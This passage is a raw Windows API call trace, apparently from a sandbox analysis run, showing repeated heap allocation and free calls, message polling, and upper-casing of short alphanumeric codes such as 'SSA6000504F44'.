lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0251.807] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0251.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0251.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0251.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0251.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0251.807] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0251.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0251.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0251.807] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0251.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0251.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2dd8 [0251.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0251.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0251.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0251.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0251.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1888 [0251.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0251.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2c18 [0251.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0251.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0251.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17e8 [0251.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0251.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3e8 [0251.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0251.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0251.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0251.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0251.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0251.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0251.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0251.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0251.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0251.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0251.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0251.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0251.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0251.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0251.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0251.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0251.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0251.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0251.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0251.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0251.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0251.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0251.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0251.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0251.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0251.809] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0251.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0251.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0251.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0251.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0251.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0251.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0251.810] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0251.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0251.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0251.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0251.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0251.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0251.810] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0251.810] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0251.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0251.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0251.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0251.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0251.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0251.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0251.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0251.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0251.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0251.811] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0251.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0251.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0251.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0251.811] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0251.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0251.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0251.812] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0251.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0251.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0251.812] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0251.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0251.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0251.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0251.813] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.813] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0251.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0251.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.813] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.813] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0251.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0251.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0251.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.813] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0251.813] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.813] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0251.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0251.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.814] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.814] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0251.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0251.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0251.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0251.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.814] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0251.814] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0251.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0251.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0251.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0251.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.815] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0251.815] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.816] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0251.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0251.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.816] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.816] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0251.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0251.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0251.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0251.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.816] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0251.816] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0251.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0251.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0251.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0251.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.817] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0251.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.817] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0251.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0251.817] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.817] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.818] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0251.818] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.818] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0251.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.818] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0251.818] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd 